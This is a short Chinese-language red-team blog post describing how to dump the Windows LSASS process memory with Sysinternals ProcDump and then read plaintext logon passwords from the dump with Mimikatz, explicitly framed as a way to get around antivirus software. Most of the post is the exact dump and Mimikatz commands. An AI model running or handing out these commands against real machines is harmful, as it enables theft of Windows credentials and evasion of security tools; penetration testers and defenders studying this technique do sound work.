1. 首页
  2. 红队技术

利用procdump+Mimikatz 绕过杀软获取Windows明文密码

1.Procdump 简介

Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中.

2.procdump下载地址

procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

3.下载dmp命令:

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
利用procdump+Mimikatz 绕过杀软获取Windows明文密码

4.Mimikatz 读取dmp文件获取明文

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords
利用procdump+Mimikatz 绕过杀软获取Windows明文密码

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/2860.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息